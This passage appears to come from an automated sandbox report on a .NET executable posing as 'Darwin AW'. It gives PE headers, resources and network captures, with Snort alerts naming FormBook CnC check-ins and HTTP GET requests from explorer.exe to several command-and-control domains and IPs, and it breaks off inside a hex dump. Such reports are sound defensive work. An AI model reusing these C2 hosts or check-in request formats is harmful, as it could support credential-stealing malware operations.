                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xb46c80x4f.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xb60000x1cf1c.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xd40000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000xb27200xb2800False0.667656906513data6.9991644311IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc0xb60000x1cf1c0x1d000False0.201845366379data3.98922230811IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0xd40000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountry
                                                    RT_ICON0xb62500x3a30PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                    RT_ICON0xb9c800x10828dBase III DBT, version number 0, next free block index 40
                                                    RT_ICON0xca4a80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4180250588, next used block 3679691228
                                                    RT_ICON0xce6d00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4213345501, next used block 4213345501
                                                    RT_ICON0xd0c780x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4229663197, next used block 4229663197
                                                    RT_ICON0xd1d200x468GLS_BINARY_LSB_FIRST
                                                    RT_GROUP_ICON0xd21880x5adata
                                                    RT_GROUP_ICON0xd21e40x4cdata
                                                    RT_VERSION0xd22300x33cdata
                                                    RT_MANIFEST0xd256c0x9b0XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Version Infos

                                                    DescriptionData
                                                    Translation0x0000 0x04b0
                                                    LegalCopyrightCopyright F@Soft
                                                    Assembly Version1.0.6.2
                                                    InternalNameTypeNameNati.exe
                                                    FileVersion1.0.6.0
                                                    CompanyNameF@Soft
                                                    LegalTrademarks
                                                    Comments
                                                    ProductNameDarwin AW
                                                    ProductVersion1.0.6.0
                                                    FileDescriptionDarwin AW
                                                    OriginalFilenameTypeNameNati.exe

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    09/27/21-15:39:31.449550TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981480192.168.2.445.39.212.49
                                                    09/27/21-15:39:31.449550TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981480192.168.2.445.39.212.49
                                                    09/27/21-15:39:31.449550TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981480192.168.2.445.39.212.49
                                                    09/27/21-15:39:58.482221TCP1201ATTACK-RESPONSES 403 Forbidden804984334.102.136.180192.168.2.4

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Sep 27, 2021 15:39:31.272725105 CEST4981480192.168.2.445.39.212.49
                                                    Sep 27, 2021 15:39:31.449140072 CEST804981445.39.212.49192.168.2.4
                                                    Sep 27, 2021 15:39:31.449354887 CEST4981480192.168.2.445.39.212.49
                                                    Sep 27, 2021 15:39:31.449549913 CEST4981480192.168.2.445.39.212.49
                                                    Sep 27, 2021 15:39:31.616306067 CEST804981445.39.212.49192.168.2.4
                                                    Sep 27, 2021 15:39:31.616342068 CEST804981445.39.212.49192.168.2.4
                                                    Sep 27, 2021 15:39:31.616358995 CEST804981445.39.212.49192.168.2.4
                                                    Sep 27, 2021 15:39:31.616620064 CEST4981480192.168.2.445.39.212.49
                                                    Sep 27, 2021 15:39:31.616714001 CEST4981480192.168.2.445.39.212.49
                                                    Sep 27, 2021 15:39:31.779278040 CEST804981445.39.212.49192.168.2.4
                                                    Sep 27, 2021 15:39:41.910136938 CEST4984080192.168.2.475.102.22.71
                                                    Sep 27, 2021 15:39:42.031163931 CEST804984075.102.22.71192.168.2.4
                                                    Sep 27, 2021 15:39:42.035304070 CEST4984080192.168.2.475.102.22.71
                                                    Sep 27, 2021 15:39:42.035630941 CEST4984080192.168.2.475.102.22.71
                                                    Sep 27, 2021 15:39:42.156266928 CEST804984075.102.22.71192.168.2.4
                                                    Sep 27, 2021 15:39:42.378464937 CEST804984075.102.22.71192.168.2.4
                                                    Sep 27, 2021 15:39:42.378494978 CEST804984075.102.22.71192.168.2.4
                                                    Sep 27, 2021 15:39:42.378709078 CEST4984080192.168.2.475.102.22.71
                                                    Sep 27, 2021 15:39:42.378741026 CEST4984080192.168.2.475.102.22.71
                                                    Sep 27, 2021 15:39:42.499806881 CEST804984075.102.22.71192.168.2.4
                                                    Sep 27, 2021 15:39:47.450299025 CEST4984180192.168.2.445.207.75.185
                                                    Sep 27, 2021 15:39:47.646929979 CEST804984145.207.75.185192.168.2.4
                                                    Sep 27, 2021 15:39:47.647068977 CEST4984180192.168.2.445.207.75.185
                                                    Sep 27, 2021 15:39:47.647291899 CEST4984180192.168.2.445.207.75.185
                                                    Sep 27, 2021 15:39:47.847558975 CEST804984145.207.75.185192.168.2.4
                                                    Sep 27, 2021 15:39:47.847588062 CEST804984145.207.75.185192.168.2.4
                                                    Sep 27, 2021 15:39:47.847604036 CEST804984145.207.75.185192.168.2.4
                                                    Sep 27, 2021 15:39:47.847892046 CEST4984180192.168.2.445.207.75.185
                                                    Sep 27, 2021 15:39:47.847971916 CEST4984180192.168.2.445.207.75.185
                                                    Sep 27, 2021 15:39:48.042392015 CEST804984145.207.75.185192.168.2.4
                                                    Sep 27, 2021 15:39:52.903827906 CEST4984280192.168.2.4198.54.117.211
                                                    Sep 27, 2021 15:39:53.068312883 CEST8049842198.54.117.211192.168.2.4
                                                    Sep 27, 2021 15:39:53.068428993 CEST4984280192.168.2.4198.54.117.211
                                                    Sep 27, 2021 15:39:53.068717003 CEST4984280192.168.2.4198.54.117.211
                                                    Sep 27, 2021 15:39:53.233625889 CEST8049842198.54.117.211192.168.2.4
                                                    Sep 27, 2021 15:39:53.233709097 CEST8049842198.54.117.211192.168.2.4
                                                    Sep 27, 2021 15:39:58.290477991 CEST4984380192.168.2.434.102.136.180
                                                    Sep 27, 2021 15:39:58.302994013 CEST804984334.102.136.180192.168.2.4
                                                    Sep 27, 2021 15:39:58.303240061 CEST4984380192.168.2.434.102.136.180
                                                    Sep 27, 2021 15:39:58.303410053 CEST4984380192.168.2.434.102.136.180
                                                    Sep 27, 2021 15:39:58.315804958 CEST804984334.102.136.180192.168.2.4
                                                    Sep 27, 2021 15:39:58.482220888 CEST804984334.102.136.180192.168.2.4
                                                    Sep 27, 2021 15:39:58.482250929 CEST804984334.102.136.180192.168.2.4
                                                    Sep 27, 2021 15:39:58.482431889 CEST4984380192.168.2.434.102.136.180
                                                    Sep 27, 2021 15:39:58.482527018 CEST4984380192.168.2.434.102.136.180
                                                    Sep 27, 2021 15:39:58.495142937 CEST804984334.102.136.180192.168.2.4

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Sep 27, 2021 15:38:19.595406055 CEST4925753192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:38:19.622272968 CEST53492578.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:38:39.199588060 CEST6238953192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:38:39.213253021 CEST53623898.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:38:41.844594002 CEST4991053192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:38:41.910773993 CEST53499108.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:38:43.140964985 CEST5585453192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:38:43.156037092 CEST53558548.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:38:43.657636881 CEST6454953192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:38:43.716121912 CEST53645498.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:38:43.767191887 CEST6315353192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:38:43.802781105 CEST53631538.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:38:44.340895891 CEST5299153192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:38:44.354152918 CEST53529918.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:38:45.226753950 CEST5370053192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:38:45.242503881 CEST53537008.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:38:45.816740036 CEST5172653192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:38:45.830069065 CEST53517268.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:38:46.389954090 CEST5679453192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:38:46.458076000 CEST53567948.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:38:47.980997086 CEST5653453192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:38:47.994081020 CEST53565348.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:38:50.735300064 CEST5662753192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:38:50.748965025 CEST53566278.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:38:51.207144022 CEST5662153192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:38:51.219227076 CEST53566218.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:39:04.830495119 CEST6311653192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:39:04.850363016 CEST53631168.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:39:30.163616896 CEST6407853192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:39:30.176691055 CEST53640788.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:39:31.060952902 CEST6480153192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:39:31.094593048 CEST53648018.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:39:31.213728905 CEST6172153192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:39:31.265556097 CEST53617218.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:39:41.648133993 CEST5125553192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:39:41.908919096 CEST53512558.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:39:47.418817043 CEST6152253192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:39:47.448826075 CEST53615228.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:39:52.862185955 CEST5233753192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:39:52.902616024 CEST53523378.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:39:58.254683018 CEST5504653192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:39:58.289097071 CEST53550468.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:40:03.184714079 CEST4961253192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:40:03.301177979 CEST53496128.8.8.8192.168.2.4
                                                    Sep 27, 2021 15:40:03.486049891 CEST4928553192.168.2.48.8.8.8
                                                    Sep 27, 2021 15:40:03.632539988 CEST53492858.8.8.8192.168.2.4

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Sep 27, 2021 15:39:31.213728905 CEST192.168.2.48.8.8.80x86fStandard query (0)www.00333v.comA (IP address)IN (0x0001)
                                                    Sep 27, 2021 15:39:41.648133993 CEST192.168.2.48.8.8.80x28b6Standard query (0)www.yuumgo.academyA (IP address)IN (0x0001)
                                                    Sep 27, 2021 15:39:47.418817043 CEST192.168.2.48.8.8.80xf73cStandard query (0)www.b0ay.comA (IP address)IN (0x0001)
                                                    Sep 27, 2021 15:39:52.862185955 CEST192.168.2.48.8.8.80xf17fStandard query (0)www.axswallet.comA (IP address)IN (0x0001)
                                                    Sep 27, 2021 15:39:58.254683018 CEST192.168.2.48.8.8.80x42eeStandard query (0)www.interweavelife.comA (IP address)IN (0x0001)
                                                    Sep 27, 2021 15:40:03.486049891 CEST192.168.2.48.8.8.80xa709Standard query (0)www.relativewifi.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Sep 27, 2021 15:39:31.265556097 CEST8.8.8.8192.168.2.40x86fNo error (0)www.00333v.com45.39.212.49A (IP address)IN (0x0001)
                                                    Sep 27, 2021 15:39:41.908919096 CEST8.8.8.8192.168.2.40x28b6No error (0)www.yuumgo.academyyuumgo.academyCNAME (Canonical name)IN (0x0001)
                                                    Sep 27, 2021 15:39:41.908919096 CEST8.8.8.8192.168.2.40x28b6No error (0)yuumgo.academy75.102.22.71A (IP address)IN (0x0001)
                                                    Sep 27, 2021 15:39:47.448826075 CEST8.8.8.8192.168.2.40xf73cNo error (0)www.b0ay.com45.207.75.185A (IP address)IN (0x0001)
                                                    Sep 27, 2021 15:39:52.902616024 CEST8.8.8.8192.168.2.40xf17fNo error (0)www.axswallet.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                    Sep 27, 2021 15:39:52.902616024 CEST8.8.8.8192.168.2.40xf17fNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                    Sep 27, 2021 15:39:52.902616024 CEST8.8.8.8192.168.2.40xf17fNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                    Sep 27, 2021 15:39:52.902616024 CEST8.8.8.8192.168.2.40xf17fNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                    Sep 27, 2021 15:39:52.902616024 CEST8.8.8.8192.168.2.40xf17fNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                    Sep 27, 2021 15:39:52.902616024 CEST8.8.8.8192.168.2.40xf17fNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                    Sep 27, 2021 15:39:52.902616024 CEST8.8.8.8192.168.2.40xf17fNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                    Sep 27, 2021 15:39:52.902616024 CEST8.8.8.8192.168.2.40xf17fNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                    Sep 27, 2021 15:39:58.289097071 CEST8.8.8.8192.168.2.40x42eeNo error (0)www.interweavelife.cominterweavelife.comCNAME (Canonical name)IN (0x0001)
                                                    Sep 27, 2021 15:39:58.289097071 CEST8.8.8.8192.168.2.40x42eeNo error (0)interweavelife.com34.102.136.180A (IP address)IN (0x0001)
                                                    Sep 27, 2021 15:40:03.632539988 CEST8.8.8.8192.168.2.40xa709No error (0)www.relativewifi.com170.75.251.7A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • www.00333v.com
                                                    • www.yuumgo.academy
                                                    • www.b0ay.com
                                                    • www.axswallet.com
                                                    • www.interweavelife.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.44981445.39.212.4980C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Sep 27, 2021 15:39:31.449549913 CEST5939OUTGET /qfff/?zVsX=A0Gd4dmxD4WpN&h0Dpm=EtMhOrO65XWqZe1V/yWpI1DgXrgEJw48YTYdNBZuHNrU3gzc/ZcPLe5HxHKJImHY7C2C HTTP/1.1
                                                    Host: www.00333v.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Sep 27, 2021 15:39:31.616306067 CEST5942INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Mon, 27 Sep 2021 13:39:16 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 1235
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 c9 c7 ce b2 d9 b2 ba d3 cd f8 c2 e7 bc bc ca f5 d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 34 35 33 36 3b 26 23 32 34 35 35 31 3b 26 23 33 33 36 30 39 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 2c 2c 2c 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 34 35 33 36 3b 26 23 32 34 35 35 31 3b 26 23 33 33 36 30 39 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 2c 2c 2c 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 32 30 32 31 26 23 78 35 45 37 34 3b 26 23 78 36 37 30 30 3b 26 23 78 36 35 42 30 3b 26 23 78 36 37 30 30 3b 26 23 78 35 31 36 38 3b 26 23 32 34 35 33 36 3b 26 23 32 34 35 35 31 3b 26 23 33 33 36 30 39 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 78 34 45 39 32 3b 26 23 78 35 32 44 35 3b 26 23 78 34 45 41 34 3b 26 23 78 36 44 34 31 3b 26 23 78 35 45 37 33 3b 26 23 78 38 31 46 41 3b 2c 26 23 78 34 45 30 41 3b 26 23 78 38 34 32 43 3b 26 23 78 37 44 42 32 3b 26 23 78 35 33 43 42 3b 26 23 78 35 32 30 36 3b 26 23 78 34 45 41 42 3b 26 23 78 35 36 46 44 3b 26 23 78 34 45 41 37 3b 26 23 78 37 43 42 45 3b 26 23 78 35 34 43 31 3b 26 23 78 38 31 45 41 3b 26 23 78 36 32 43 44 3b 26 23 78 35 46 43 33 3b 26 23 78 35 46 39 37 3b 2c 26 23 78 35 37 32 38 3b 26 23 78 39 30 31 39 3b 26 23 78 38 38 43 46 3b 26 23 78 35 33 45 46 3b 26 23 78 34 45 45 35 3b 26 23 78 36 32 37 45 3b 26 23 78 35 32 33 30 3b 32 30 32 31 26 23 78 35 37 32 38 3b 26 23 78 37 45 42 46 3b 26 23 78 38 39 43 32 3b 26 23 78 37 37 30 42 3b 26 23 78 36 37 30 30 3b 26 23 78 36 35 42 30 3b 26 23 78 38 43 43 37 3b 26 23 78 38 41 30 41 3b 2c 26 23 78 39 30 31 41 3b 26 23 78 34 46 44 37 3b 26 23 78 36 36 31 33 3b 26 23 78 36 31 43 32 3b 26 23 78 35 37 33 30 3b 26 23 78 36 33 38 43 3b 26 23 78 36 33 45 31 3b 26 23 78 36 34 41 44 3b 26 23 78 36 35 33 45 3b 26 23 78 35 43 30 38 3b 26 23 78 36 39 36 44 3b 26 23 78 37 37 45 35 3b 26 23 78 38 42 35 38 3b 2c 26 23 78 38 42 39 33 3b 26 23 78 36 30 41 38 3b 26 23 78 35 46 45 42 3b 26 23 78 39 30 31 46 3b 26 23 78 36 33 38 43 3b 26 23 78 36 33 45 31 3b 26 23 78 36 37 30 30 3b 26 23 78 36 35 42 30 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65
                                                    Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#24536;&#24551;&#33609;&#22312;&#32447;&#35266;&#30475;&#25773;&#25918;&#20813;&#36153;,,,</title><meta name="keywords" content="&#24536;&#24551;&#33609;&#22312;&#32447;&#35266;&#30475;&#25773;&#25918;&#20813;&#36153;,,," /><meta name="description" content="2021&#x5E74;&#x6700;&#x65B0;&#x6700;&#x5168;&#24536;&#24551;&#33609;&#22312;&#32447;&#35266;&#30475;&#25773;&#25918;&#20813;&#36153;&#x4E92;&#x52D5;&#x4EA4;&#x6D41;&#x5E73;&#x81FA;,&#x4E0A;&#x842C;&#x7DB2;&#x53CB;&#x5206;&#x4EAB;&#x56FD;&#x4EA7;&#x7CBE;&#x54C1;&#x81EA;&#x62CD;&#x5FC3;&#x5F97;,&#x5728;&#x9019;&#x88CF;&#x53EF;&#x4EE5;&#x627E;&#x5230;2021&#x5728;&#x7EBF;&#x89C2;&#x770B;&#x6700;&#x65B0;&#x8CC7;&#x8A0A;,&#x901A;&#x4FD7;&#x6613;&#x61C2;&#x5730;&#x638C;&#x63E1;&#x64AD;&#x653E;&#x5C08;&#x696D;&#x77E5;&#x8B58;,&#x8B93;&#x60A8;&#x5FEB;&#x901F;&#x638C;&#x63E1;&#x6700;&#x65B0;" /><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="te


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.44984075.102.22.7180C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Sep 27, 2021 15:39:42.035630941 CEST6001OUTGET /qfff/?zVsX=A0Gd4dmxD4WpN&h0Dpm=iDjkn8VHWDd5B+WgyzOmaYrOSSt87z3Zq6ekoRCiL96i4fBr+80owih/KVqhv8s04Bt0 HTTP/1.1
                                                    Host: www.yuumgo.academy
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Sep 27, 2021 15:39:42.378464937 CEST6002INHTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    content-type: text/html; charset=UTF-8
                                                    expires: Mon, 27 Sep 2021 14:39:41 GMT
                                                    cache-control: max-age=3600
                                                    x-redirect-by: WordPress
                                                    location: http://yuumgo.academy/qfff/?zVsX=A0Gd4dmxD4WpN&h0Dpm=iDjkn8VHWDd5B+WgyzOmaYrOSSt87z3Zq6ekoRCiL96i4fBr+80owih/KVqhv8s04Bt0
                                                    content-length: 0
                                                    date: Mon, 27 Sep 2021 13:39:41 GMT


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.44984145.207.75.18580C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Sep 27, 2021 15:39:47.647291899 CEST6003OUTGET /qfff/?h0Dpm=0w7wS7Gxy1y5PVkYFF5lNTBCNhhGoi1bMCJY/cwIOuW+ZMKS9RSTzNeIK/4fDqykK2MY&zVsX=A0Gd4dmxD4WpN HTTP/1.1
                                                    Host: www.b0ay.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Sep 27, 2021 15:39:47.847558975 CEST6004INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Mon, 27 Sep 2021 13:39:44 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 1743
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 c9 f1 c5 a9 bc dc ba d9 d9 c4 bd cc d3 fd d7 c9 d1 af d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 31 33 32 30 3b 26 23 32 32 38 31 32 3b 26 23 32 30 32 36 32 3b 26 23 32 30 32 36 32 3b 26 23 32 31 33 32 30 3b 26 23 32 32 38 31 32 3b 26 23 32 30 32 36 32 3b 2c 26 23 32 30 30 30 34 3b 26 23 32 30 30 31 30 3b 26 23 32 30 31 35 34 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 36 36 3b 26 23 36 38 3b 2c 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 32 35 30 38 3b 26 23 32 31 35 31 32 3b 26 23 32 30 30 31 33 3b 26 23 32 35 39 39 31 3b 26 23 32 33 33 38 33 3b 26 23 32 34 31 34 39 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 34 39 3b 2c 26 23 33 36 32 32 39 3b 26 23 33 30 37 30 31 3b 26 23 33 35 30 33 33 3b 26 23 32 31 33 39 37 3b 26 23 32 35 31 35 32 3b 26 23 33 38 37 30 36 3b 26 23 33 33 30 38 30 3b 26 23 32 30 38 34 30 3b 26 23 32 36 32 32 33 3b 26 23 32 30 35 39 39 3b 26 23 32 35 32 39 33 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 32 32 36 39 3b 26 23 32 